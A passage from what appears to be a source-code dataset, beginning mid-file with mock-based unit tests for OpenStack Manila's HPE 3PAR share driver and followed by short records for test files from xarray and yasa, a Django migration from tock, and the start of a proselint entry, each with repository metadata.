ssh_conn_timeout=conf.ssh_conn_timeout)])
self.mock_mediator.assert_has_calls([
mock.call.do_setup(),
mock.call.get_vfs(constants.EXPECTED_FPG)])
def test_driver_setup_dhss_success(self):
"""Driver do_setup without any errors with dhss=True."""
self.test_driver_setup_success()
self.assertEqual(constants.EXPECTED_FPG_MAP, self.driver.fpgs)
def test_driver_setup_no_dhss_success(self):
"""Driver do_setup without any errors with dhss=False."""
self.conf.driver_handles_share_servers = False
self.test_driver_setup_success()
self.assertEqual(constants.EXPECTED_FPG_MAP, self.driver.fpgs)
def test_driver_setup_no_dhss_multi_getvfs_success(self):
"""Driver do_setup when dhss=False, getvfs returns multiple IPs."""
self.conf.driver_handles_share_servers = False
self.test_driver_setup_success(
get_vfs_ret_val=constants.EXPECTED_GET_VFS_MULTIPLES)
self.assertEqual(constants.EXPECTED_FPG_MAP,
self.driver.fpgs)
def test_driver_setup_success_no_dhss_no_conf_ss_ip(self):
"""test driver's do_setup()
Driver do_setup with dhss=False, share server ip not set in config file
but discoverable at 3par array
"""
self.conf.driver_handles_share_servers = False
# ss ip not provided in conf
original_fpg = deepcopy(self.conf.hpe3par_fpg)
self.conf.hpe3par_fpg[0][constants.EXPECTED_FPG] = []
self.test_driver_setup_success()
self.assertEqual(constants.EXPECTED_FPG_MAP, self.driver.fpgs)
constants.EXPECTED_FPG_CONF = original_fpg
def test_driver_setup_failure_no_dhss_no_conf_ss_ip(self):
"""Configured IP address is required for dhss=False."""
self.conf.driver_handles_share_servers = False
# ss ip not provided in conf
fpg_without_ss_ip = deepcopy(self.conf.hpe3par_fpg)
self.conf.hpe3par_fpg[0][constants.EXPECTED_FPG] = []
# ss ip not configured on array
vfs_without_ss_ip = deepcopy(constants.EXPECTED_GET_VFS)
vfs_without_ss_ip['vfsip']['address'] = []
self.mock_mediator.get_vfs.return_value = vfs_without_ss_ip
self.assertRaises(exception.HPE3ParInvalid,
self.driver.do_setup, None)
constants.EXPECTED_FPG_CONF = fpg_without_ss_ip
def test_driver_setup_mediator_error(self):
"""Driver do_setup when the mediator setup fails."""
self.mock_mediator.do_setup.side_effect = (
exception.ShareBackendException('fail'))
self.assertRaises(exception.ShareBackendException,
self.driver.do_setup, None)
conf = self.conf
self.mock_mediator_constructor.assert_has_calls([
mock.call(hpe3par_san_ssh_port=conf.hpe3par_san_ssh_port,
hpe3par_san_password=conf.hpe3par_san_password,
hpe3par_username=conf.hpe3par_username,
hpe3par_san_login=conf.hpe3par_san_login,
hpe3par_debug=conf.hpe3par_debug,
hpe3par_api_url=conf.hpe3par_api_url,
hpe3par_password=conf.hpe3par_password,
hpe3par_san_ip=conf.hpe3par_san_ip,
hpe3par_fstore_per_share=conf.hpe3par_fstore_per_share,
hpe3par_require_cifs_ip=conf.hpe3par_require_cifs_ip,
hpe3par_cifs_admin_access_username=(
conf.hpe3par_cifs_admin_access_username),
hpe3par_cifs_admin_access_password=(
conf.hpe3par_cifs_admin_access_password),
hpe3par_cifs_admin_access_domain=(
conf.hpe3par_cifs_admin_access_domain),
hpe3par_share_mount_path=conf.hpe3par_share_mount_path,
my_ip=self.conf.my_ip,
ssh_conn_timeout=conf.ssh_conn_timeout)])
self.mock_mediator.assert_has_calls([mock.call.do_setup()])
def test_driver_setup_with_vfs_error(self):
"""Driver do_setup when the get_vfs fails."""
self.mock_mediator.get_vfs.side_effect = (
exception.ShareBackendException('fail'))
self.assertRaises(exception.ShareBackendException,
self.driver.do_setup, None)
conf = self.conf
self.mock_mediator_constructor.assert_has_calls([
mock.call(hpe3par_san_ssh_port=conf.hpe3par_san_ssh_port,
hpe3par_san_password=conf.hpe3par_san_password,
hpe3par_username=conf.hpe3par_username,
hpe3par_san_login=conf.hpe3par_san_login,
hpe3par_debug=conf.hpe3par_debug,
hpe3par_api_url=conf.hpe3par_api_url,
hpe3par_password=conf.hpe3par_password,
hpe3par_san_ip=conf.hpe3par_san_ip,
hpe3par_fstore_per_share=conf.hpe3par_fstore_per_share,
hpe3par_require_cifs_ip=conf.hpe3par_require_cifs_ip,
hpe3par_cifs_admin_access_username=(
conf.hpe3par_cifs_admin_access_username),
hpe3par_cifs_admin_access_password=(
conf.hpe3par_cifs_admin_access_password),
hpe3par_cifs_admin_access_domain=(
conf.hpe3par_cifs_admin_access_domain),
hpe3par_share_mount_path=conf.hpe3par_share_mount_path,
my_ip=self.conf.my_ip,
ssh_conn_timeout=conf.ssh_conn_timeout)])
self.mock_mediator.assert_has_calls([
mock.call.do_setup(),
mock.call.get_vfs(constants.EXPECTED_FPG)])
def test_driver_setup_conf_ips_validation_fails(self):
"""Driver do_setup when the _validate_pool_ips fails."""
self.conf.driver_handles_share_servers = False
vfs_with_ss_ip = deepcopy(constants.EXPECTED_GET_VFS)
vfs_with_ss_ip['vfsip']['address'] = ['10.100.100.100']
self.mock_mediator.get_vfs.return_value = vfs_with_ss_ip
self.assertRaises(exception.HPE3ParInvalid,
self.driver.do_setup, None)
conf = self.conf
self.mock_mediator_constructor.assert_has_calls([
mock.call(hpe3par_san_ssh_port=conf.hpe3par_san_ssh_port,
hpe3par_san_password=conf.hpe3par_san_password,
hpe3par_username=conf.hpe3par_username,
hpe3par_san_login=conf.hpe3par_san_login,
hpe3par_debug=conf.hpe3par_debug,
hpe3par_api_url=conf.hpe3par_api_url,
hpe3par_password=conf.hpe3par_password,
hpe3par_san_ip=conf.hpe3par_san_ip,
hpe3par_fstore_per_share=conf.hpe3par_fstore_per_share,
hpe3par_require_cifs_ip=conf.hpe3par_require_cifs_ip,
hpe3par_cifs_admin_access_username=(
conf.hpe3par_cifs_admin_access_username),
hpe3par_cifs_admin_access_password=(
conf.hpe3par_cifs_admin_access_password),
hpe3par_cifs_admin_access_domain=(
conf.hpe3par_cifs_admin_access_domain),
hpe3par_share_mount_path=conf.hpe3par_share_mount_path,
my_ip=self.conf.my_ip,
ssh_conn_timeout=conf.ssh_conn_timeout)])
self.mock_mediator.assert_has_calls([
mock.call.do_setup(),
mock.call.get_vfs(constants.EXPECTED_FPG)])
def init_driver(self):
"""Simple driver setup for re-use with tests that need one."""
self.driver._hpe3par = self.mock_mediator
self.driver.fpgs = constants.EXPECTED_FPG_MAP
self.mock_object(hpe3pardriver, 'share_types')
get_extra_specs = hpe3pardriver.share_types.get_extra_specs_from_share
get_extra_specs.return_value = constants.EXPECTED_EXTRA_SPECS
def test_driver_check_for_setup_error_success(self):
"""check_for_setup_error when things go well."""
# Generally this is always mocked, but here we reference the class.
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
self.mock_object(hpe3pardriver, 'LOG')
self.init_driver()
self.driver.check_for_setup_error()
expected_calls = [
mock.call.debug('HPE3ParShareDriver SHA1: %s', mock.ANY),
mock.call.debug('HPE3ParMediator SHA1: %s', mock.ANY)
]
hpe3pardriver.LOG.assert_has_calls(expected_calls)
def test_driver_check_for_setup_error_exception(self):
"""check_for_setup_error catch and log any exceptions."""
# Since HPE3ParMediator is mocked, we'll hit the except/log.
self.mock_object(hpe3pardriver, 'LOG')
self.init_driver()
self.driver.check_for_setup_error()
expected_calls = [
mock.call.debug('HPE3ParShareDriver SHA1: %s', mock.ANY),
mock.call.debug('Source code SHA1 not logged due to: %s', mock.ANY)
]
hpe3pardriver.LOG.assert_has_calls(expected_calls)
@ddt.data(([constants.SHARE_SERVER], constants.SHARE_SERVER),
([], None),)
@ddt.unpack
def test_choose_share_server_compatible_with_share(self, share_servers,
expected_share_sever):
context = None
share_server = self.driver.choose_share_server_compatible_with_share(
context,
share_servers,
constants.NFS_SHARE_INFO,
None,
None)
self.assertEqual(expected_share_sever, share_server)
def test_choose_share_server_compatible_with_share_with_cg(self):
context = None
cg_ref = {'id': 'dummy'}
self.assertRaises(
exception.InvalidRequest,
self.driver.choose_share_server_compatible_with_share,
context,
[constants.SHARE_SERVER],
constants.NFS_SHARE_INFO,
None,
cg_ref)
def do_create_share(self, protocol, share_type_id, expected_project_id,
expected_share_id, expected_size):
"""Re-usable code for create share."""
context = None
share = {
'display_name': constants.EXPECTED_SHARE_NAME,
'host': constants.EXPECTED_HOST,
'project_id': expected_project_id,
'id': expected_share_id,
'share_proto': protocol,
'share_type_id': share_type_id,
'size': expected_size,
}
location = self.driver.create_share(context, share,
constants.SHARE_SERVER)
return location
def do_create_share_from_snapshot(self,
protocol,
share_type_id,
snapshot_instance,
expected_share_id,
expected_size):
"""Re-usable code for create share from snapshot."""
context = None
share = {
'project_id': constants.EXPECTED_PROJECT_ID,
'display_name': constants.EXPECTED_SHARE_NAME,
'host': constants.EXPECTED_HOST,
'id': expected_share_id,
'share_proto': protocol,
'share_type_id': share_type_id,
'size': expected_size,
}
location = self.driver.create_share_from_snapshot(
context,
share,
snapshot_instance,
constants.SHARE_SERVER)
return location
@ddt.data((constants.UNEXPECTED_HOST, exception.InvalidHost),
(constants.HOST_WITHOUT_POOL_1, exception.InvalidHost),
(constants.HOST_WITHOUT_POOL_2, exception.InvalidHost))
@ddt.unpack
def test_driver_create_share_fails_get_pool_location(self, host,
expected_exception):
"""get_pool_location fails to extract pool name from host"""
self.init_driver()
context = None
share_server = None
share = {
'display_name': constants.EXPECTED_SHARE_NAME,
'host': host,
'project_id': constants.EXPECTED_PROJECT_ID,
'id': constants.EXPECTED_SHARE_ID,
'share_proto': constants.CIFS,
'share_type_id': constants.SHARE_TYPE_ID,
'size': constants.EXPECTED_SIZE_2,
}
self.assertRaises(expected_exception,
self.driver.create_share,
context, share, share_server)
def test_driver_create_cifs_share(self):
self.init_driver()
expected_location = '\\\\%s\\%s' % (constants.EXPECTED_IP_10203040,
constants.EXPECTED_SHARE_NAME)
self.mock_mediator.create_share.return_value = (
constants.EXPECTED_SHARE_NAME)
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
location = self.do_create_share(constants.CIFS,
constants.SHARE_TYPE_ID,
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_2)
self.assertIn(expected_location, location)
expected_calls = [mock.call.create_share(
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.CIFS,
constants.EXPECTED_EXTRA_SPECS,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
comment=mock.ANY,
size=constants.EXPECTED_SIZE_2)]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_create_nfs_share(self):
self.init_driver()
expected_location = ':'.join((constants.EXPECTED_IP_10203040,
constants.EXPECTED_SHARE_PATH))
self.mock_mediator.create_share.return_value = (
constants.EXPECTED_SHARE_PATH)
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
location = self.do_create_share(constants.NFS,
constants.SHARE_TYPE_ID,
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_1)
self.assertIn(expected_location, location)
expected_calls = [
mock.call.create_share(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_EXTRA_SPECS,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
comment=mock.ANY,
size=constants.EXPECTED_SIZE_1)]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_create_cifs_share_from_snapshot(self):
self.init_driver()
expected_location = '\\\\%s\\%s' % (constants.EXPECTED_IP_10203040,
constants.EXPECTED_SHARE_NAME)
self.mock_mediator.create_share_from_snapshot.return_value = (
constants.EXPECTED_SHARE_NAME)
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
snapshot_instance = constants.SNAPSHOT_INSTANCE.copy()
snapshot_instance['protocol'] = constants.CIFS
location = self.do_create_share_from_snapshot(
constants.CIFS,
constants.SHARE_TYPE_ID,
snapshot_instance,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_2)
self.assertIn(expected_location, location)
expected_calls = [
mock.call.create_share_from_snapshot(
constants.EXPECTED_SHARE_ID,
constants.CIFS,
constants.EXPECTED_EXTRA_SPECS,
constants.EXPECTED_FSTORE,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SNAP_ID,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
[constants.EXPECTED_IP_10203040],
comment=mock.ANY,
size=constants.EXPECTED_SIZE_2),
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_create_nfs_share_from_snapshot(self):
self.init_driver()
expected_location = ':'.join((constants.EXPECTED_IP_10203040,
constants.EXPECTED_SHARE_PATH))
self.mock_mediator.create_share_from_snapshot.return_value = (
constants.EXPECTED_SHARE_PATH)
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
location = self.do_create_share_from_snapshot(
constants.NFS,
constants.SHARE_TYPE_ID,
constants.SNAPSHOT_INSTANCE,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_1)
self.assertIn(expected_location, location)
expected_calls = [
mock.call.create_share_from_snapshot(
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_EXTRA_SPECS,
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SNAP_ID,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
[constants.EXPECTED_IP_10203040],
comment=mock.ANY,
size=constants.EXPECTED_SIZE_1),
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_delete_share(self):
self.init_driver()
context = None
share_server = None
share = {
'project_id': constants.EXPECTED_PROJECT_ID,
'id': constants.EXPECTED_SHARE_ID,
'share_proto': constants.CIFS,
'size': constants.EXPECTED_SIZE_1,
'host': constants.EXPECTED_HOST
}
self.driver.delete_share(context, share, share_server)
expected_calls = [
mock.call.delete_share(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_1,
constants.CIFS,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
constants.EXPECTED_IP_10203040)]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_create_snapshot(self):
self.init_driver()
context = None
share_server = None
self.driver.create_snapshot(context,
constants.SNAPSHOT_INFO,
share_server)
expected_calls = [
mock.call.create_snapshot(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_SNAP_ID,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_delete_snapshot(self):
self.init_driver()
context = None
share_server = None
self.driver.delete_snapshot(context,
constants.SNAPSHOT_INFO,
share_server)
expected_calls = [
mock.call.delete_snapshot(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_SNAP_ID,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_update_access_add_rule(self):
self.init_driver()
context = None
self.driver.update_access(context,
constants.NFS_SHARE_INFO,
[constants.ACCESS_RULE_NFS],
[constants.ADD_RULE_IP],
[],
constants.SHARE_SERVER)
expected_calls = [
mock.call.update_access(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_EXTRA_SPECS,
[constants.ACCESS_RULE_NFS],
[constants.ADD_RULE_IP],
[],
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_update_access_delete_rule(self):
self.init_driver()
context = None
self.driver.update_access(context,
constants.NFS_SHARE_INFO,
[constants.ACCESS_RULE_NFS],
[],
[constants.DELETE_RULE_IP],
constants.SHARE_SERVER)
expected_calls = [
mock.call.update_access(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_EXTRA_SPECS,
[constants.ACCESS_RULE_NFS],
[],
[constants.DELETE_RULE_IP],
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_extend_share(self):
self.init_driver()
old_size = constants.NFS_SHARE_INFO['size']
new_size = old_size * 2
share_server = None
self.driver.extend_share(constants.NFS_SHARE_INFO,
new_size, share_server)
self.mock_mediator.resize_share.assert_called_once_with(
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
new_size,
old_size,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
def test_driver_shrink_share(self):
self.init_driver()
old_size = constants.NFS_SHARE_INFO['size']
new_size = old_size / 2
share_server = None
self.driver.shrink_share(constants.NFS_SHARE_INFO,
new_size, share_server)
self.mock_mediator.resize_share.assert_called_once_with(
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
new_size,
old_size,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
def test_driver_get_share_stats_not_ready(self):
"""Protect against stats update before driver is ready."""
self.mock_object(hpe3pardriver, 'LOG')
expected_result = {
'driver_handles_share_servers': True,
'qos': False,
'driver_version': self.driver.VERSION,
'free_capacity_gb': 0,
'max_over_subscription_ratio': None,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'provisioned_capacity_gb': 0,
'share_backend_name': 'HPE_3PAR',
'snapshot_support': True,
'create_share_from_snapshot_support': True,
'revert_to_snapshot_support': False,
'mount_snapshot_support': False,
'share_group_stats': {
'consistent_snapshot_support': None,
},
'storage_protocol': 'NFS_CIFS',
'thin_provisioning': True,
'total_capacity_gb': 0,
'vendor_name': 'HPE',
'pools': None,
'replication_domain': None,
'filter_function': None,
'goodness_function': None,
'ipv4_support': True,
'ipv6_support': False,
'max_share_server_size': -1,
'max_shares_per_share_server': -1,
'security_service_update_support': False,
'share_server_multiple_subnet_support': False,
'network_allocation_update_support': False,
}
result = self.driver.get_share_stats(refresh=True)
self.assertEqual(expected_result, result)
expected_calls = [
mock.call.info('Skipping capacity and capabilities update. '
'Setup has not completed.')
]
hpe3pardriver.LOG.assert_has_calls(expected_calls)
def test_driver_get_share_stats_no_refresh(self):
"""Driver does not call mediator when refresh=False."""
self.init_driver()
self.driver._stats = constants.EXPECTED_STATS
result = self.driver.get_share_stats(refresh=False)
self.assertEqual(constants.EXPECTED_STATS, result)
self.assertEqual([], self.mock_mediator.mock_calls)
def test_driver_get_share_stats_with_refresh(self):
"""Driver adds stats from mediator to expected structure."""
self.init_driver()
expected_free = constants.EXPECTED_SIZE_1
expected_capacity = constants.EXPECTED_SIZE_2
expected_version = self.driver.VERSION
self.mock_mediator.get_fpg_status.return_value = {
'pool_name': constants.EXPECTED_FPG,
'total_capacity_gb': expected_capacity,
'free_capacity_gb': expected_free,
'thin_provisioning': True,
'dedupe': False,
'hpe3par_flash_cache': False,
'hp3par_flash_cache': False,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'provisioned_capacity_gb': expected_capacity
}
expected_result = {
'share_backend_name': 'HPE_3PAR',
'vendor_name': 'HPE',
'driver_version': expected_version,
'storage_protocol': 'NFS_CIFS',
'driver_handles_share_servers': True,
'total_capacity_gb': 0,
'free_capacity_gb': 0,
'provisioned_capacity_gb': 0,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'max_over_subscription_ratio': None,
'max_share_server_size': -1,
'max_shares_per_share_server': -1,
'qos': False,
'thin_provisioning': True,
'pools': [{
'pool_name': constants.EXPECTED_FPG,
'total_capacity_gb': expected_capacity,
'free_capacity_gb': expected_free,
'thin_provisioning': True,
'dedupe': False,
'hpe3par_flash_cache': False,
'hp3par_flash_cache': False,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'provisioned_capacity_gb': expected_capacity}],
'snapshot_support': True,
'create_share_from_snapshot_support': True,
'revert_to_snapshot_support': False,
'security_service_update_support': False,
'share_server_multiple_subnet_support': False,
'network_allocation_update_support': False,
'mount_snapshot_support': False,
'share_group_stats': {
'consistent_snapshot_support': None,
},
'replication_domain': None,
'filter_function': None,
'goodness_function': None,
'ipv4_support': True,
'ipv6_support': False,
}
result = self.driver.get_share_stats(refresh=True)
self.assertEqual(expected_result, result)
expected_calls = [
mock.call.get_fpg_status(constants.EXPECTED_FPG)
]
self.mock_mediator.assert_has_calls(expected_calls)
self.assertTrue(self.mock_mediator.get_fpg_status.called)
def test_driver_get_share_stats_premature(self):
"""Driver init stats before init_driver completed."""
expected_version = self.driver.VERSION
self.mock_mediator.get_fpg_status.return_value = {'not_called': 1}
expected_result = {
'qos': False,
'driver_handles_share_servers': True,
'driver_version': expected_version,
'free_capacity_gb': 0,
'max_over_subscription_ratio': None,
'max_share_server_size': -1,
'max_shares_per_share_server': -1,
'pools': None,
'provisioned_capacity_gb': 0,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'share_backend_name': 'HPE_3PAR',
'storage_protocol': 'NFS_CIFS',
'thin_provisioning': True,
'total_capacity_gb': 0,
'vendor_name': 'HPE',
'snapshot_support': True,
'create_share_from_snapshot_support': True,
'revert_to_snapshot_support': False,
'security_service_update_support': False,
'share_server_multiple_subnet_support': False,
'network_allocation_update_support': False,
'mount_snapshot_support': False,
'share_group_stats': {
'consistent_snapshot_support': None,
},
'replication_domain': None,
'filter_function': None,
'goodness_function': None,
'ipv4_support': True,
'ipv6_support': False,
}
result = self.driver.get_share_stats(refresh=True)
self.assertEqual(expected_result, result)
self.assertFalse(self.mock_mediator.get_fpg_status.called)
@ddt.data(('test"dquote', 'test_dquote'),
("test'squote", "test_squote"),
('test-:;,.punc', 'test-:_punc'),
('test with spaces ', 'test with spaces '),
('x' * 300, 'x' * 300))
@ddt.unpack
def test_build_comment(self, display_name, clean_name):
host = 'test-stack1@backend#pool'
share = {
'host': host,
'display_name': display_name
}
comment = self.driver.build_share_comment(share)
cleaned = {
'host': host,
'clean_name': clean_name
}
expected = ("OpenStack Manila - host=%(host)s "
"orig_name=%(clean_name)s created=" % cleaned)[:254]
self.assertLess(len(comment), 255)
self.assertTrue(comment.startswith(expected))
# Test for some chars that are not allowed.
# Don't test with same regex as the code uses.
for c in "'\".,;":
self.assertNotIn(c, comment)
def test_get_network_allocations_number(self):
self.assertEqual(1, self.driver.get_network_allocations_number())
def test_setup_server(self):
"""Setup server by creating a new FSIP."""
self.init_driver()
network_info = [{
'network_allocations': [
{'ip_address': constants.EXPECTED_IP_1234}],
'cidr': '/'.join((constants.EXPECTED_IP_1234,
constants.CIDR_PREFIX)),
'network_type': constants.EXPECTED_VLAN_TYPE,
'segmentation_id': constants.EXPECTED_VLAN_TAG,
'server_id': constants.EXPECTED_SERVER_ID,
}]
expected_result = {
'share_server_name': constants.EXPECTED_SERVER_ID,
'share_server_id': constants.EXPECTED_SERVER_ID,
'ip': constants.EXPECTED_IP_1234,
'subnet': constants.EXPECTED_SUBNET,
'vlantag': constants.EXPECTED_VLAN_TAG,
'fpg': constants.EXPECTED_FPG,
'vfs': constants.EXPECTED_VFS,
}
metadata = {'request_host': constants.EXPECTED_HOST}
result = self.driver._setup_server(network_info, metadata)
expected_calls = [
mock.call.create_fsip(constants.EXPECTED_IP_1234,
constants.EXPECTED_SUBNET,
constants.EXPECTED_VLAN_TAG,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)
self.assertEqual(expected_result, result)
def test_setup_server_fails_for_unsupported_network_type(self):
"""Setup server fails for unsupported network type"""
self.init_driver()
network_info = [{
'network_allocations': [
{'ip_address': constants.EXPECTED_IP_1234}],
'cidr': '/'.join((constants.EXPECTED_IP_1234,
constants.CIDR_PREFIX)),
'network_type': constants.EXPECTED_VXLAN_TYPE,
'segmentation_id': constants.EXPECTED_VLAN_TAG,
'server_id': constants.EXPECTED_SERVER_ID,
}]
metadata = {'request_host': constants.EXPECTED_HOST}
self.assertRaises(exception.NetworkBadConfigurationException,
self.driver._setup_server,
network_info, metadata)
def test_setup_server_fails_for_exceed_pool_max_supported_ips(self):
"""Setup server fails when the VFS has reached max supported IPs"""
self.init_driver()
network_info = [{
'network_allocations': [
{'ip_address': constants.EXPECTED_IP_1234}],
'cidr': '/'.join((constants.EXPECTED_IP_1234,
constants.CIDR_PREFIX)),
'network_type': constants.EXPECTED_VLAN_TYPE,
'segmentation_id': constants.EXPECTED_VLAN_TAG,
'server_id': constants.EXPECTED_SERVER_ID,
}]
metadata = {'request_host': constants.EXPECTED_HOST}
expected_vfs = self.driver.fpgs[
constants.EXPECTED_FPG][constants.EXPECTED_VFS]
self.driver.fpgs[constants.EXPECTED_FPG][constants.EXPECTED_VFS] = [
'10.0.0.1', '10.0.0.2', '10.0.0.3', '10.0.0.4']
self.assertRaises(exception.Invalid,
self.driver._setup_server,
network_info, metadata)
self.driver.fpgs[constants.EXPECTED_FPG][constants.EXPECTED_VFS
] = expected_vfs
def test_teardown_server(self):
"""Test tear down server"""
self.init_driver()
server_details = {
'ip': constants.EXPECTED_IP_10203040,
'fpg': constants.EXPECTED_FPG,
'vfs': constants.EXPECTED_VFS,
}
self.driver._teardown_server(server_details)
expected_calls = [
mock.call.remove_fsip(constants.EXPECTED_IP_10203040,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)
|
b48105ef50eb7ce0e8e1f0832e2609542bb84ac2
|
90b5859f1d59690291aafb2720e3c9b379175c12
|
/xarray/tests/test_tutorial.py
|
9d59219c20437077b2a3f5eb1ef0e90163e6ff70
|
[
"BSD-3-Clause",
"CC-BY-4.0",
"Apache-2.0",
"Python-2.0"
] |
permissive
|
pydata/xarray
|
ddbcc883519366aac24a3abc7c7d211213c61b11
|
dd09bddc62d701721565bbed3731e9586ea306d0
|
refs/heads/main
| 2023-09-01T11:41:04.476821
| 2023-09-01T09:37:14
| 2023-09-01T09:37:14
| 13,221,727
| 2,916
| 1,164
|
Apache-2.0
| 2023-09-14T20:54:53
| 2013-09-30T17:21:10
|
Python
|
UTF-8
|
Python
| false
| false
| 982
|
py
|
test_tutorial.py
|
from __future__ import annotations
import pytest
from xarray import DataArray, tutorial
from xarray.tests import assert_identical, network
@network
class TestLoadDataset:
@pytest.fixture(autouse=True)
def setUp(self):
self.testfile = "tiny"
def test_download_from_github(self, tmp_path) -> None:
cache_dir = tmp_path / tutorial._default_cache_dir_name
ds = tutorial.open_dataset(self.testfile, cache_dir=cache_dir).load()
tiny = DataArray(range(5), name="tiny").to_dataset()
assert_identical(ds, tiny)
def test_download_from_github_load_without_cache(
self, tmp_path, monkeypatch
) -> None:
cache_dir = tmp_path / tutorial._default_cache_dir_name
ds_nocache = tutorial.open_dataset(
self.testfile, cache=False, cache_dir=cache_dir
).load()
ds_cache = tutorial.open_dataset(self.testfile, cache_dir=cache_dir).load()
assert_identical(ds_cache, ds_nocache)
|
6e13e78412bf1b468883c06645b05bbc7412f411
|
b3950a2a6912c9b494d22b9353322c3357df0110
|
/tock/employees/migrations/0029_remove_userdata_is_18f_employee.py
|
1ca12a697a742c7b1fa8236a65ba981d6f1a07c4
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain",
"MIT"
] |
permissive
|
18F/tock
|
df1fa5e817e690ce0bff315a15799e2f78915882
|
99005d8f6c4605a69fbb620c41f38447ecbee459
|
refs/heads/main
| 2023-08-31T01:34:55.299577
| 2023-08-23T18:49:10
| 2023-08-23T18:49:10
| 30,162,008
| 135
| 50
|
NOASSERTION
| 2023-09-07T18:40:30
| 2015-02-01T22:19:32
|
Python
|
UTF-8
|
Python
| false
| false
| 351
|
py
|
0029_remove_userdata_is_18f_employee.py
|
# Generated by Django 2.2.12 on 2020-05-05 01:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('employees', '0028_remove_userdata_is_billable'),
]
operations = [
migrations.RemoveField(
model_name='userdata',
name='is_18f_employee',
),
]
|
af9e5fc4248357501557b3b453d1c2aad9950565
|
353e6363f1f57930240b296be6515855d7541a50
|
/yasa/tests/test_io.py
|
952a2d30122648860bc4f9c84a8039177d5f0130
|
[
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
raphaelvallat/yasa
|
1e0d79f955dde9f2d06e39c18d0279d1711fa2ae
|
9d9fb741887c96c3259e2fd0b66f525b76dbd623
|
refs/heads/master
| 2023-08-22T07:18:43.003934
| 2022-12-31T17:36:12
| 2022-12-31T17:36:12
| 161,560,926
| 313
| 106
|
BSD-3-Clause
| 2023-01-01T00:19:51
| 2018-12-13T00:14:38
|
Python
|
UTF-8
|
Python
| false
| false
| 990
|
py
|
test_io.py
|
"""Test I/O."""
import pytest
import logging
import unittest
from yasa.io import (
is_sleepecg_installed,
set_log_level,
is_tensorpac_installed,
is_pyriemann_installed,
)
logger = logging.getLogger("yasa")
levels = ["debug", "info", "warning", "error", "critical"]
class TestIO(unittest.TestCase):
"""Test IO functions."""
def test_log_level(self):
"""Test setting the log level."""
for lev in levels:
set_log_level(lev)
set_log_level(False)
set_log_level(True)
set_log_level(None)
with pytest.raises(ValueError):
set_log_level("WRONG")
def test_logger(self):
"""Test logger levels."""
logger.debug("debug")
logger.info("info")
logger.warning("warning")
logger.critical("critical")
def test_dependence(self):
"""Test dependancies."""
is_tensorpac_installed()
is_pyriemann_installed()
is_sleepecg_installed()
|
a28f68709e34d612711961bbc0c054d5748b58eb
|
de84a9c84e9fd00fb1cf52c69381b20c96463f2b
|
/worker.py
|
bfc87b1f451c0b7c488f5a437231d9915d9e8db7
|
[
"BSD-3-Clause"
] |
permissive
|
amperser/proselint
|
23b7b1a0963bf036dde9326b3bb0bbbfcdf26c61
|
b5b7536bec5fd461e45cacad87c2aab9ea33ac35
|
refs/heads/main
